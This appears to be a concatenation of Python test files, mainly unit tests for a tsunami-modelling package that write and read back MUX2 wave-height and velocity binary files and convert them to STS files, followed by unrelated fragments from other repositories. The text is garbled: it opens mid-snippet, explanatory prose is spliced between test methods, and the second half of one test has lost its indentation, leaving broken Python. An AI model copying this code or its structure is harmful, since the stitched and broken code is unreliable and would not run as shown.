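# Five stations, three timesteps each; station i holds values i*10 + t.
rows = [[i * 10.0 + t for t in range(3)] for i in range(5)]
picked = select_stations(rows, [4, 0, 2])
```

This is why each assert compares `data[i][:parameters_index]` against `ha0[permutation[i], :]` rather than `ha0[i, :]`.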
    def test_read_mux_platform_problem2(self):
        """test_read_mux_platform_problem2
        This is to test a situation where read_mux returned
        wrong values Win32
        This test does not pass on Windows but test_read_mux_platform_problem1
        does
        """
        from anuga.file.urs_ext import read_mux2
        from anuga.config import single_precision as epsilon
        verbose = False
        tide = 1.5
        time_step_count = 10
        time_step = 0.2
        times_ref = num.arange(0, time_step_count*time_step, time_step)
        lat_long_points = [(-21.5,114.5), (-21,114.5), (-21.5,115),
                           (-21.,115.), (-22., 117.)]
        n = len(lat_long_points)
        # Create different timeseries starting and ending at different times
        first_tstep = num.ones(n,int)
        first_tstep[0] += 2 # Point 0 starts at 2
        first_tstep[1] += 4 # Point 1 starts at 4
        first_tstep[2] += 3 # Point 2 starts at 3
        last_tstep = (time_step_count)*num.ones(n,int)
        last_tstep[0] -= 1 # Point 0 ends 1 step early
        last_tstep[1] -= 2 # Point 1 ends 2 steps early
        last_tstep[4] -= 3 # Point 4 ends 3 steps early
        # Create varying elevation data (positive values for seafloor)
        gauge_depth = 20*num.ones(n,float)
        for i in range(n):
            gauge_depth[i] += i**2
        # Create data to be written to second mux file
        ha1 = num.ones((n,time_step_count),float)
        ha1[0] = num.sin(times_ref)
        ha1[1] = 2*num.sin(times_ref - 3)
        ha1[2] = 5*num.sin(4*times_ref)
        ha1[3] = num.sin(times_ref)
        ha1[4] = num.sin(2*times_ref-0.7)
        ua1 = num.zeros((n,time_step_count),float)
        ua1[0] = 3*num.cos(times_ref)
        ua1[1] = 2*num.sin(times_ref-0.7)
        ua1[2] = num.arange(3*time_step_count,4*time_step_count)
        ua1[4] = 2*num.ones(time_step_count)
        va1 = num.zeros((n,time_step_count),float)
        va1[0] = 2*num.cos(times_ref-0.87)
        va1[1] = 3*num.ones(time_step_count)
        va1[3] = 2*num.sin(times_ref-0.71)
        # Ensure data used to write mux file to be zero when gauges are
        # not recording
        for i in range(n):
            # For each point
            for j in list(range(0, first_tstep[i]-1)) + list(range(last_tstep[i], time_step_count)):
                # For timesteps before and after recording range
                ha1[i][j] = ua1[i][j] = va1[i][j] = 0.0
        #print 'Second station to be written to MUX'
        #print 'ha', ha1[0,:]
        #print 'ua', ua1[0,:]
        #print 'va', va1[0,:]
        # Write second mux file to be combined by urs2sts
        base_nameII, filesII = self.write_mux2(lat_long_points,
                                               time_step_count, time_step,
                                               first_tstep, last_tstep,
                                               depth=gauge_depth,
                                               ha=ha1,
                                               ua=ua1,
                                               va=va1)
        # Read mux file back and verify its correctness
        ####################################################
        # FIXME (Ole): This is where the test should
        # verify that the MUX files are correct.
        #JJ: It appears as though
        #that certain quantities are not being stored with enough precision
        #in muxfile or more likely that they are being cast into a
        #lower precision when read in using read_mux2. Time step and q_time
        # are equal but only to approx 1e-7
        ####################################################
        #define information as it should be stored in mux2 files
        points_num = len(lat_long_points)
        depth = gauge_depth
        ha = ha1
        ua = ua1
        va = va1
        quantities = ['HA','UA','VA']
        mux_names = [WAVEHEIGHT_MUX2_LABEL,
                     EAST_VELOCITY_MUX2_LABEL,
                     NORTH_VELOCITY_MUX2_LABEL]
        quantities_init = [[],[],[]]
        latlondeps = []
        #irrelevant header information
        ig=ilon=ilat=0
        mcolat=mcolon=centerlat=centerlon=offset=az=baz=id=0.0
        # urs binary is latitude fastest
        for i,point in enumerate(lat_long_points):
            lat = point[0]
            lon = point[1]
            _ , e, n = redfearn(lat, lon)
            if depth is None:
                this_depth = n
            else:
                this_depth = depth[i]
            latlondeps.append([lat, lon, this_depth])
            if ha is None:
                this_ha = e
                quantities_init[0].append(num.ones(time_step_count,float)*this_ha) # HA
            else:
                quantities_init[0].append(ha[i])
            if ua is None:
                this_ua = n
                quantities_init[1].append(num.ones(time_step_count,float)*this_ua) # UA
            else:
                quantities_init[1].append(ua[i])
            if va is None:
                this_va = e
                quantities_init[2].append(num.ones(time_step_count,float)*this_va) # VA
            else:
                quantities_init[2].append(va[i])
        for i, q in enumerate(quantities):
            #print
            #print i, q
            q_time = num.zeros((time_step_count, points_num), float)
            quantities_init[i] = ensure_numeric(quantities_init[i])
            for time in range(time_step_count):
                #print i, q, time, quantities_init[i][:,time]
                q_time[time,:] = quantities_init[i][:,time]
                #print i, q, time, q_time[time, :]
            filename = base_nameII + mux_names[i]
            f = open(filename, 'rb')
            assert abs(points_num-unpack('i',f.read(4))[0])<epsilon
            #check mux 2 header
            for latlondep in latlondeps:
                assert abs(latlondep[0]-unpack('f',f.read(4))[0])<epsilon
                assert abs(latlondep[1]-unpack('f',f.read(4))[0])<epsilon
                assert abs(mcolat-unpack('f',f.read(4))[0])<epsilon
                assert abs(mcolon-unpack('f',f.read(4))[0])<epsilon
                assert abs(ig-unpack('i',f.read(4))[0])<epsilon
                assert abs(ilon-unpack('i',f.read(4))[0])<epsilon
                assert abs(ilat-unpack('i',f.read(4))[0])<epsilon
                assert abs(latlondep[2]-unpack('f',f.read(4))[0])<epsilon
                assert abs(centerlat-unpack('f',f.read(4))[0])<epsilon
                assert abs(centerlon-unpack('f',f.read(4))[0])<epsilon
                assert abs(offset-unpack('f',f.read(4))[0])<epsilon
                assert abs(az-unpack('f',f.read(4))[0])<epsilon
                assert abs(baz-unpack('f',f.read(4))[0])<epsilon
                x = unpack('f', f.read(4))[0]
                #print time_step
                #print x
                assert abs(time_step-x)<epsilon
                assert abs(time_step_count-unpack('i',f.read(4))[0])<epsilon
                for j in range(4): # identifier
                    assert abs(id-unpack('i',f.read(4))[0])<epsilon
            #first_tstep=1
            #last_tstep=time_step_count
            for i,latlondep in enumerate(latlondeps):
                assert abs(first_tstep[i]-unpack('i',f.read(4))[0])<epsilon
            for i,latlondep in enumerate(latlondeps):
                assert abs(last_tstep[i]-unpack('i',f.read(4))[0])<epsilon
            # Find when first station starts recording
            min_tstep = min(first_tstep)
            # Find when all stations have stopped recording
            max_tstep = max(last_tstep)
            #for time in range(time_step_count):
            for time in range(min_tstep-1,max_tstep):
                assert abs(time*time_step-unpack('f',f.read(4))[0])<epsilon
                for point_i in range(points_num):
                    if time+1>=first_tstep[point_i] and time+1<=last_tstep[point_i]:
                        x = unpack('f',f.read(4))[0]
                        #print time, x, q_time[time, point_i]
                        if q == 'VA': x = -x # South is positive in MUX
                        assert abs(q_time[time, point_i]-x)<epsilon
            f.close()
        # Create ordering file
        permutation = ensure_numeric([4,0,2])
        # _, ordering_filename = tempfile.mkstemp('')
        # order_fid = open(ordering_filename, 'w')
        # order_fid.write('index, longitude, latitude\n')
        # for index in permutation:
        #     order_fid.write('%d, %f, %f\n' %(index,
        #                                      lat_long_points[index][1],
        #                                      lat_long_points[index][0]))
        # order_fid.close()
        # -------------------------------------
        # Now read files back and check values
        weights = ensure_numeric([1.0])
        # For each quantity read the associated list of source mux2 file with
        # extension associated with that quantity
        file_params = -1*num.ones(3,float) # [nsta,dt,nt]
        OFFSET = 5
        for j, file in enumerate(filesII):
            # Read stage, u, v enumerated as j
            #print 'Reading', j, file
            data = read_mux2(1, [str(file).encode()], weights, file_params, permutation, verbose)
            #print 'Data received by Python'
            #print data[1][8]
            number_of_selected_stations = data.shape[0]
            # Index where data ends and parameters begin
            parameters_index = data.shape[1]-OFFSET
            quantity = num.zeros((number_of_selected_stations, parameters_index), float)
            for i in range(number_of_selected_stations):
                #print i, parameters_index
                #print quantity[i][:]
                if j == 0: assert num.allclose(data[i][:parameters_index], ha1[permutation[i], :])
                if j == 1: assert num.allclose(data[i][:parameters_index], ua1[permutation[i], :])
                if j == 2:
                    # FIXME (Ole): This is where the output is wrong on Win32
                    #print
                    #print j, i
                    #print 'Input'
                    #print 'u', ua1[permutation[i], 8]
                    #print 'v', va1[permutation[i], 8]
                    #print 'Output'
                    #print 'v ', data[i][:parameters_index][8]
                    # South is positive in MUX
                    #print "data[i][:parameters_index]", data[i][:parameters_index]
                    #print "-va1[permutation[i], :]", -va1[permutation[i], :]
                    assert num.allclose(data[i][:parameters_index], -va1[permutation[i], :])
        self.delete_mux(filesII)
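The `single_precision` epsilon used throughout the header checks above (and the "equal but only to approx 1e-7" observation in the FIXME) comes down to one fact: a float64 value generally does not survive a round trip through the 4-byte `'f'` format. A minimal demonstration:

```python
import struct

# Why the header comparisons need a single-precision epsilon: 0.2 has no
# exact float32 representation, so packing it with 'f' and unpacking
# yields a slightly different float64 (error on the order of 1e-9 here,
# and up to ~1e-7 relative error in general for float32).
time_step = 0.2
round_tripped = struct.unpack('f', struct.pack('f', time_step))[0]
error = abs(round_tripped - time_step)
```

This is also why the Win-results notes in `test_read_mux_platform_problem3` show behavior changing as `time_step` is perturbed at the 1e-7 to 1e-9 level.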
    def test_read_mux_platform_problem3(self):
        # This is to test a situation where read_mux returned
        # wrong values Win32
        from anuga.file.urs_ext import read_mux2
        from anuga.config import single_precision as epsilon
        verbose = False
        tide = 1.5
        time_step_count = 10
        time_step = 0.02
        '''
        Win results
        time_step = 0.2000001
        This is OK
        '''
        '''
        Win results
        time_step = 0.20000001
        ======================================================================
        ERROR: test_read_mux_platform_problem3 (__main__.Test_Data_Manager)
        ----------------------------------------------------------------------
        Traceback (most recent call last):
          File "test_data_manager.py", line 6718, in test_read_mux_platform_problem3
            ha1[0]=num.sin(times_ref)
        ValueError: matrices are not aligned for copy
        '''
        '''
        Win results
        time_step = 0.200000001
        FAIL
        assert num.allclose(data[i][:parameters_index],
                            -va1[permutation[i], :])
        '''
        times_ref = num.arange(0, time_step_count*time_step, time_step)
        #print "times_ref", times_ref
        lat_long_points = [(-21.5,114.5), (-21,114.5), (-21.5,115),
                           (-21.,115.), (-22., 117.)]
        stations = len(lat_long_points)
        # Create different timeseries starting and ending at different times
        first_tstep = num.ones(stations, int)
        first_tstep[0] += 2 # Point 0 starts at 2
        first_tstep[1] += 4 # Point 1 starts at 4
        first_tstep[2] += 3 # Point 2 starts at 3
        last_tstep = (time_step_count)*num.ones(stations, int)
        last_tstep[0] -= 1 # Point 0 ends 1 step early
        last_tstep[1] -= 2 # Point 1 ends 2 steps early
        last_tstep[4] -= 3 # Point 4 ends 3 steps early
        # Create varying elevation data (positive values for seafloor)
        gauge_depth = 20*num.ones(stations, float)
        for i in range(stations):
            gauge_depth[i] += i**2
        # Create data to be written to second mux file
        ha1 = num.ones((stations,time_step_count), float)
        ha1[0] = num.sin(times_ref)
        ha1[1] = 2*num.sin(times_ref - 3)
        ha1[2] = 5*num.sin(4*times_ref)
        ha1[3] = num.sin(times_ref)
        ha1[4] = num.sin(2*times_ref-0.7)
        ua1 = num.zeros((stations,time_step_count),float)
        ua1[0] = 3*num.cos(times_ref)
        ua1[1] = 2*num.sin(times_ref-0.7)
        ua1[2] = num.arange(3*time_step_count,4*time_step_count)
        ua1[4] = 2*num.ones(time_step_count)
        va1 = num.zeros((stations,time_step_count),float)
        va1[0] = 2*num.cos(times_ref-0.87)
        va1[1] = 3*num.ones(time_step_count)
        va1[3] = 2*num.sin(times_ref-0.71)
        #print "va1[0]", va1[0] # The 8th element is what will go bad.
        # Ensure data used to write mux file to be zero when gauges are
        # not recording
        for i in range(stations):
            # For each point
            for j in list(range(0, first_tstep[i]-1)) + list(range(last_tstep[i],
                                                                   time_step_count)):
                # For timesteps before and after recording range
                ha1[i][j] = ua1[i][j] = va1[i][j] = 0.0
        #print 'Second station to be written to MUX'
        #print 'ha', ha1[0,:]
        #print 'ua', ua1[0,:]
        #print 'va', va1[0,:]
        # Write second mux file to be combined by urs2sts
        base_nameII, filesII = self.write_mux2(lat_long_points,
                                               time_step_count, time_step,
                                               first_tstep, last_tstep,
                                               depth=gauge_depth,
                                               ha=ha1,
                                               ua=ua1,
                                               va=va1)
        #print "filesII", filesII
        # Read mux file back and verify its correctness
        ####################################################
        # FIXME (Ole): This is where the test should
        # verify that the MUX files are correct.
        #JJ: It appears as though
        #that certain quantities are not being stored with enough precision
        #in muxfile or more likely that they are being cast into a
        #lower precision when read in using read_mux2. Time step and q_time
        # are equal but only to approx 1e-7
        ####################################################
        #define information as it should be stored in mux2 files
        points_num = len(lat_long_points)
        depth = gauge_depth
        ha = ha1
        ua = ua1
        va = va1
        quantities = ['HA','UA','VA']
        mux_names = [WAVEHEIGHT_MUX2_LABEL,
                     EAST_VELOCITY_MUX2_LABEL,
                     NORTH_VELOCITY_MUX2_LABEL]
        quantities_init = [[],[],[]]
        latlondeps = []
        #irrelevant header information
        ig=ilon=ilat=0
        mcolat=mcolon=centerlat=centerlon=offset=az=baz=id=0.0
        # urs binary is latitude fastest
        for i,point in enumerate(lat_long_points):
            lat = point[0]
            lon = point[1]
            _ , e, n = redfearn(lat, lon)
            if depth is None:
                this_depth = n
            else:
                this_depth = depth[i]
            latlondeps.append([lat, lon, this_depth])
            if ha is None:
                this_ha = e
                quantities_init[0].append(num.ones(time_step_count,
                                                   float)*this_ha) # HA
            else:
                quantities_init[0].append(ha[i])
            if ua is None:
                this_ua = n
                quantities_init[1].append(num.ones(time_step_count,
                                                   float)*this_ua) # UA
            else:
                quantities_init[1].append(ua[i])
            if va is None:
                this_va = e
                quantities_init[2].append(num.ones(time_step_count,
                                                   float)*this_va) # VA
            else:
                quantities_init[2].append(va[i])
        for i, q in enumerate(quantities):
            #print
            #print i, q
            q_time = num.zeros((time_step_count, points_num), float)
            quantities_init[i] = ensure_numeric(quantities_init[i])
            for time in range(time_step_count):
                #print i, q, time, quantities_init[i][:,time]
                q_time[time,:] = quantities_init[i][:,time]
                #print i, q, time, q_time[time, :]
            filename = base_nameII + mux_names[i]
            f = open(filename, 'rb')
            assert abs(points_num-unpack('i',f.read(4))[0])<epsilon
            #check mux 2 header
            for latlondep in latlondeps:
                assert abs(latlondep[0]-unpack('f',f.read(4))[0])<epsilon
                assert abs(latlondep[1]-unpack('f',f.read(4))[0])<epsilon
                assert abs(mcolat-unpack('f',f.read(4))[0])<epsilon
                assert abs(mcolon-unpack('f',f.read(4))[0])<epsilon
                assert abs(ig-unpack('i',f.read(4))[0])<epsilon
                assert abs(ilon-unpack('i',f.read(4))[0])<epsilon
                assert abs(ilat-unpack('i',f.read(4))[0])<epsilon
                assert abs(latlondep[2]-unpack('f',f.read(4))[0])<epsilon
                assert abs(centerlat-unpack('f',f.read(4))[0])<epsilon
                assert abs(centerlon-unpack('f',f.read(4))[0])<epsilon
                assert abs(offset-unpack('f',f.read(4))[0])<epsilon
                assert abs(az-unpack('f',f.read(4))[0])<epsilon
                assert abs(baz-unpack('f',f.read(4))[0])<epsilon
                x = unpack('f', f.read(4))[0]
                #print time_step
                #print x
                assert abs(time_step-x)<epsilon
                assert abs(time_step_count-unpack('i',f.read(4))[0])<epsilon
                for j in range(4): # identifier
                    assert abs(id-unpack('i',f.read(4))[0])<epsilon
            #first_tstep=1
            #last_tstep=time_step_count
            for i,latlondep in enumerate(latlondeps):
                assert abs(first_tstep[i]-unpack('i',f.read(4))[0])<epsilon
            for i,latlondep in enumerate(latlondeps):
                assert abs(last_tstep[i]-unpack('i',f.read(4))[0])<epsilon
            # Find when first station starts recording
            min_tstep = min(first_tstep)
            # Find when all stations have stopped recording
            max_tstep = max(last_tstep)
            #for time in range(time_step_count):
            for time in range(min_tstep-1,max_tstep):
                assert abs(time*time_step-unpack('f',f.read(4))[0])<epsilon
for point_i in range(points_num):
if time+1>=first_tstep[point_i] and time+1<=last_tstep[point_i]:
x = unpack('f',f.read(4))[0]
#print time, x, q_time[time, point_i]
if q == 'VA': x = -x # South is positive in MUX
#print q+" q_time[%d, %d] = %f" %(time, point_i,
#q_time[time, point_i])
assert abs(q_time[time, point_i]-x)<epsilon
f.close()
permutation = ensure_numeric([4,0,2])
# Create ordering file
# _, ordering_filename = tempfile.mkstemp('')
# order_fid = open(ordering_filename, 'w')
# order_fid.write('index, longitude, latitude\n')
# for index in permutation:
# order_fid.write('%d, %f, %f\n' %(index,
# lat_long_points[index][1],
# lat_long_points[index][0]))
# order_fid.close()
# -------------------------------------
# Now read files back and check values
weights = ensure_numeric([1.0])
# For each quantity read the associated list of source mux2 file with
# extention associated with that quantity
file_params=-1*num.ones(3,float) # [nsta,dt,nt]
OFFSET = 5
for j, file in enumerate(filesII):
# Read stage, u, v enumerated as j
#print 'Reading', j, file
#print "file", file
data = read_mux2(1, [str(file).encode()], weights, file_params,
permutation, verbose)
#print str(j) + "data", data
#print 'Data received by Python'
#print data[1][8]
number_of_selected_stations = data.shape[0]
#print "number_of_selected_stations", number_of_selected_stations
#print "stations", stations
# Index where data ends and parameters begin
parameters_index = data.shape[1]-OFFSET
for i in range(number_of_selected_stations):
#print i, parameters_index
if j == 0:
assert num.allclose(data[i][:parameters_index],
ha1[permutation[i], :])
if j == 1: assert num.allclose(data[i][:parameters_index], ua1[permutation[i], :])
if j == 2:
assert num.allclose(data[i][:parameters_index], -va1[permutation[i], :])
self.delete_mux(filesII)
    def test_urs2sts_nonstandard_projection_reverse(self):
        """
        Test that a point not in the specified zone can occur first
        """
        tide = 0
        time_step_count = 3
        time_step = 2
        lat_long_points = [(-21., 113.5), (-21., 114.5),
                           (-21., 114.), (-21., 115.)]
        n = len(lat_long_points)

        first_tstep = num.ones(n, int)
        first_tstep[0] += 1
        first_tstep[2] += 1
        last_tstep = (time_step_count)*num.ones(n, int)
        last_tstep[0] -= 1

        gauge_depth = 20*num.ones(n, float)
        ha = 2*num.ones((n, time_step_count), float)
        ha[0] = num.arange(0, time_step_count)
        ha[1] = num.arange(time_step_count, 2*time_step_count)
        ha[2] = num.arange(2*time_step_count, 3*time_step_count)
        ha[3] = num.arange(3*time_step_count, 4*time_step_count)
        ua = 5*num.ones((n, time_step_count), float)
        va = -10*num.ones((n, time_step_count), float)

        base_name, files = self.write_mux2(lat_long_points,
                                           time_step_count, time_step,
                                           first_tstep, last_tstep,
                                           depth=gauge_depth,
                                           ha=ha,
                                           ua=ua,
                                           va=va)

        urs2sts(base_name,
                basename_out=base_name,
                zone=50,
                mean_stage=tide, verbose=False)

        # now I want to check the sts file ...
        sts_file = base_name + '.sts'

        # Let's interrogate the sts file
        # Note, the sts info is not gridded. It is point data.
        fid = NetCDFFile(sts_file)

        # Make x and y absolute
        x = fid.variables['x'][:]
        y = fid.variables['y'][:]

        geo_reference = Geo_reference(NetCDFObject=fid)
        points = geo_reference.get_absolute(list(zip(x, y)))
        points = ensure_numeric(points)

        x = points[:, 0]
        y = points[:, 1]

        # Check that all coordinates are correctly represented
        # using the non-standard projection (zone 50)
        for i in range(4):
            zone, e, n = redfearn(lat_long_points[i][0], lat_long_points[i][1],
                                  zone=50)
            assert num.allclose([x[i], y[i]], [e, n])
            assert zone == geo_reference.zone

        self.delete_mux(files)
    def test_urs2stsII(self):
        """
        Test multiple sources
        """
        tide = 0
        time_step_count = 3
        time_step = 2
        lat_long_points = [(-21.5, 114.5), (-21, 114.5),
                           (-21.5, 115), (-21., 115.)]
        n = len(lat_long_points)

        first_tstep = num.ones(n, int)
        first_tstep[0] += 1
        first_tstep[2] += 1
        last_tstep = (time_step_count)*num.ones(n, int)
        last_tstep[0] -= 1

        gauge_depth = 20*num.ones(n, float)
        ha = 2*num.ones((n, time_step_count), float)
        ha[0] = num.arange(0, time_step_count)
        ha[1] = num.arange(time_step_count, 2*time_step_count)
        ha[2] = num.arange(2*time_step_count, 3*time_step_count)
        ha[3] = num.arange(3*time_step_count, 4*time_step_count)
        ua = 5*num.ones((n, time_step_count), float)
        va = -10*num.ones((n, time_step_count), float)

        # Create two identical mux files to be combined by urs2sts
        base_nameI, filesI = self.write_mux2(lat_long_points,
                                             time_step_count, time_step,
                                             first_tstep, last_tstep,
                                             depth=gauge_depth,
                                             ha=ha,
                                             ua=ua,
                                             va=va)
        base_nameII, filesII = self.write_mux2(lat_long_points,
                                               time_step_count, time_step,
                                               first_tstep, last_tstep,
                                               depth=gauge_depth,
                                               ha=ha,
                                               ua=ua,
                                               va=va)

        # Call urs2sts with multiple mux files
        urs2sts([base_nameI, base_nameII],
                basename_out=base_nameI,
                weights=[1.0, 1.0],
                mean_stage=tide,
                verbose=False)

        # now I want to check the sts file ...
        sts_file = base_nameI + '.sts'

        # Let's interrogate the sts file
        # Note, the sts info is not gridded. It is point data.
        fid = NetCDFFile(sts_file)

        # Make x and y absolute
        x = fid.variables['x'][:]
        y = fid.variables['y'][:]

        geo_reference = Geo_reference(NetCDFObject=fid)
        points = geo_reference.get_absolute(list(zip(x, y)))
        points = ensure_numeric(points)

        x = points[:, 0]
        y = points[:, 1]

        # Check that first coordinate is correctly represented
        # Work out the UTM coordinates for first point
        zone, e, n = redfearn(lat_long_points[0][0], lat_long_points[0][1])
        assert num.allclose([x[0], y[0]], [e, n])

        # Check the time vector
        times = fid.variables['time'][:]
        times_actual = []
        for i in range(time_step_count):
            times_actual.append(time_step * i)
        assert num.allclose(ensure_numeric(times),
                            ensure_numeric(times_actual))

        # Check first value
        stage = fid.variables['stage'][:]
        xmomentum = fid.variables['xmomentum'][:]
        ymomentum = fid.variables['ymomentum'][:]
        elevation = fid.variables['elevation'][:]

        # Set original data used to write mux file to be zero when gauges are
        # not recording
        ha[0][0] = 0.0
        ha[0][time_step_count-1] = 0.0
        ha[2][0] = 0.0
        ua[0][0] = 0.0
        ua[0][time_step_count-1] = 0.0
        ua[2][0] = 0.0
        va[0][0] = 0.0
        va[0][time_step_count-1] = 0.0
        va[2][0] = 0.0

        # The stage stored in the .sts file should be the sum of the stage
        # in the two mux2 files because both have weights = 1. In this case
        # the mux2 files are the same so stage == 2.0 * ha
        #print 2.0*num.transpose(ha) - stage
        assert num.allclose(2.0*num.transpose(ha), stage)  # Meters

        # Check the momentums - ua
        # momentum = velocity*(stage-elevation)
        # elevation = - depth
        # momentum = velocity_ua*(stage+depth)
        depth = num.zeros((len(lat_long_points), time_step_count), float)
        for i in range(len(lat_long_points)):
            depth[i] = gauge_depth[i]+tide+2.0*ha[i]
            # 2.0*ha is necessary because two files with weights=1 are used

        # The xmomentum stored in the .sts file should be the sum of the ua
        # in the two mux2 files multiplied by the depth.
        assert num.allclose(2.0*num.transpose(ua*depth), xmomentum)

        # Check the momentums - va
        # momentum = velocity*(stage-elevation)
        # elevation = - depth
        # momentum = velocity_va*(stage+depth)
        # The ymomentum stored in the .sts file should be the sum of the va
        # in the two mux2 files multiplied by the depth.
        assert num.allclose(2.0*num.transpose(va*depth), ymomentum)

        # Check the elevation values.
        # -ve since urs measures depth, sww measures height.
        assert num.allclose(-elevation, gauge_depth)  # Meters

        fid.close()
        self.delete_mux(filesI)
        self.delete_mux(filesII)
        os.remove(sts_file)
    def test_urs2sts0(self):
        """
        Test single source
        """
        tide = 0
        time_step_count = 3
        time_step = 2
        lat_long_points = [(-21.5, 114.5), (-21, 114.5),
                           (-21.5, 115), (-21., 115.)]
        n = len(lat_long_points)

        first_tstep = num.ones(n, int)
        first_tstep[0] += 1
        first_tstep[2] += 1
        last_tstep = (time_step_count)*num.ones(n, int)
        last_tstep[0] -= 1

        gauge_depth = 20*num.ones(n, float)
        ha = 2*num.ones((n, time_step_count), float)
        ha[0] = num.arange(0, time_step_count)
        ha[1] = num.arange(time_step_count, 2*time_step_count)
        ha[2] = num.arange(2*time_step_count, 3*time_step_count)
        ha[3] = num.arange(3*time_step_count, 4*time_step_count)
        ua = 5*num.ones((n, time_step_count), float)
        va = -10*num.ones((n, time_step_count), float)

        base_name, files = self.write_mux2(lat_long_points,
                                           time_step_count, time_step,
                                           first_tstep, last_tstep,
                                           depth=gauge_depth,
                                           ha=ha,
                                           ua=ua,
                                           va=va)

        urs2sts(base_name,
                basename_out=base_name,
                mean_stage=tide, verbose=False)

        # now I want to check the sts file ...
        sts_file = base_name + '.sts'

        # Let's interrogate the sts file
        # Note, the sts info is not gridded. It is point data.
        fid = NetCDFFile(sts_file)

        # Make x and y absolute
        x = fid.variables['x'][:]
        y = fid.variables['y'][:]

        geo_reference = Geo_reference(NetCDFObject=fid)
        points = geo_reference.get_absolute(list(zip(x, y)))
        points = ensure_numeric(points)

        x = points[:, 0]
        y = points[:, 1]

        # Check that each coordinate is correctly represented
        # Work out the UTM coordinates for each point
        for i in range(4):
            zone, e, n = redfearn(lat_long_points[i][0], lat_long_points[i][1])
            assert num.allclose([x[i], y[i]], [e, n])

        # Check the time vector
        times = fid.variables['time'][:]
        times_actual = []
        for i in range(time_step_count):
            times_actual.append(time_step * i)
        assert num.allclose(ensure_numeric(times),
                            ensure_numeric(times_actual))

        # Check first value
        stage = fid.variables['stage'][:]
        xmomentum = fid.variables['xmomentum'][:]
        ymomentum = fid.variables['ymomentum'][:]
        elevation = fid.variables['elevation'][:]

        # Set original data used to write mux file to be zero when gauges are
        # not recording
        ha[0][0] = 0.0
        ha[0][time_step_count-1] = 0.0
        ha[2][0] = 0.0
        ua[0][0] = 0.0
        ua[0][time_step_count-1] = 0.0
        ua[2][0] = 0.0
        va[0][0] = 0.0
        va[0][time_step_count-1] = 0.0
        va[2][0] = 0.0

        assert num.allclose(num.transpose(ha), stage)  # Meters

        # Check the momentums - ua
        # momentum = velocity*(stage-elevation)
        # elevation = - depth
        # momentum = velocity_ua*(stage+depth)
        depth = num.zeros((len(lat_long_points), time_step_count), float)
        for i in range(len(lat_long_points)):
            depth[i] = gauge_depth[i]+tide+ha[i]
        assert num.allclose(num.transpose(ua*depth), xmomentum)

        # Check the momentums - va
        # momentum = velocity*(stage-elevation)
        # elevation = - depth
        # momentum = velocity_va*(stage+depth)
        assert num.allclose(num.transpose(va*depth), ymomentum)

        # Check the elevation values.
        # -ve since urs measures depth, sww measures height.
        assert num.allclose(-elevation, gauge_depth)  # Meters

        fid.close()
        self.delete_mux(files)
        os.remove(sts_file)
    def test_urs2sts_nonstandard_meridian(self):
        """
        Test single source using the meridian from zone 50 as a
        nonstandard meridian
        """
        tide = 0
        time_step_count = 3
        time_step = 2
        lat_long_points = [(-21., 114.5), (-21., 113.5),
                           (-21., 114.), (-21., 115.)]
        n = len(lat_long_points)

        first_tstep = num.ones(n, int)
        first_tstep[0] += 1
        first_tstep[2] += 1
        last_tstep = (time_step_count)*num.ones(n, int)
        last_tstep[0] -= 1

        gauge_depth = 20*num.ones(n, float)
        ha = 2*num.ones((n, time_step_count), float)
        ha[0] = num.arange(0, time_step_count)
        ha[1] = num.arange(time_step_count, 2*time_step_count)
        ha[2] = num.arange(2*time_step_count, 3*time_step_count)
        ha[3] = num.arange(3*time_step_count, 4*time_step_count)
        ua = 5*num.ones((n, time_step_count), float)
        va = -10*num.ones((n, time_step_count), float)

        base_name, files = self.write_mux2(lat_long_points,
                                           time_step_count, time_step,
                                           first_tstep, last_tstep,
                                           depth=gauge_depth,
                                           ha=ha,
                                           ua=ua,
                                           va=va)

        urs2sts(base_name,
                basename_out=base_name,
                central_meridian=123,
                mean_stage=tide,
                verbose=False)

        # now I want to check the sts file ...
        sts_file = base_name + '.sts'

        # Let's interrogate the sts file
        # Note, the sts info is not gridded. It is point data.
        fid = NetCDFFile(sts_file)

        # Make x and y absolute
        x = fid.variables['x'][:]
        y = fid.variables['y'][:]

        geo_reference = Geo_reference(NetCDFObject=fid)
        points = geo_reference.get_absolute(list(zip(x, y)))
        points = ensure_numeric(points)

        x = points[:, 0]
        y = points[:, 1]

        # Check that all coordinates are correctly represented
        # using the nonstandard central meridian (123)
        for i in range(4):
            zone, e, n = redfearn(lat_long_points[i][0],
                                  lat_long_points[i][1],
                                  central_meridian=123)
            assert num.allclose([x[i], y[i]], [e, n])
            assert zone == -1

        self.delete_mux(files)
    def test_Urs_points(self):
        time_step_count = 3
        time_step = 2
        lat_long_points = [(-21.5, 114.5), (-21.5, 115), (-21., 115)]
        base_name, files = self.write_mux(lat_long_points,
                                          time_step_count, time_step)
        for file in files:
            # Check contents first
            mux_file = open(file, 'rb')
            data = mux_file.read()
            #print(data)

            urs = Read_urs(file)
            assert time_step_count == urs.time_step_count
            assert time_step == urs.time_step

            for lat_lon, dep in zip(lat_long_points, urs.lonlatdep):
                _, e, n = redfearn(lat_lon[0], lat_lon[1])
                assert num.allclose(n, dep[2])

            count = 0
            for slice in urs:
                count += 1
                #print slice
                for lat_lon, quantity in zip(lat_long_points, slice):
                    _, e, n = redfearn(lat_lon[0], lat_lon[1])
                    #print "quantity", quantity
                    #print "e", e
                    #print "n", n
                    if file[-5:] == WAVEHEIGHT_MUX_LABEL[-5:] or \
                       file[-5:] == NORTH_VELOCITY_LABEL[-5:]:
                        assert num.allclose(e, quantity)
                    if file[-5:] == EAST_VELOCITY_LABEL[-5:]:
                        assert num.allclose(n, quantity)
            assert count == time_step_count

        self.delete_mux(files)

################################################################################

if __name__ == "__main__":
    suite = unittest.makeSuite(Test_Mux, 'test')
    runner = unittest.TextTestRunner()  # verbosity=2
    runner.run(suite)

# tests/test-cases/typeinfer_basecase/case17.py (SMAT-Lab/Scalpel, Apache-2.0)
def fun1(a):
    return a


def fun2(a):
    return a + 1.0


fun2(3.0) + fun1(2.0)

# etl/index_schemas/__init__.py (BernarBerdikul/Async_API_part_1, BSD-3-Clause)
from .film_work_schema import *
from .genre_schema import *
from .person_schema import *

# tests/test_yaku_types.py (rasca0027/Mahjong4RL, MIT)
import unittest
from mahjong.components import Tile, Suit, Jihai, Naki, Huro
from mahjong.player import Player
from mahjong.components import Stack
from mahjong.naki_and_actions import check_tenpai
from mahjong.yaku_types import (
    JouKyouYaku, TeYaku, Yakuhai, Peikou, Chanta, Koutsu, Sanshoku, Somete
)
class TestJouKyouYaku(unittest.TestCase):

    def setUp(self):
        self.player = Player('test', 0)
        self.stack = Stack()
        self.bakaze = Jihai.TON

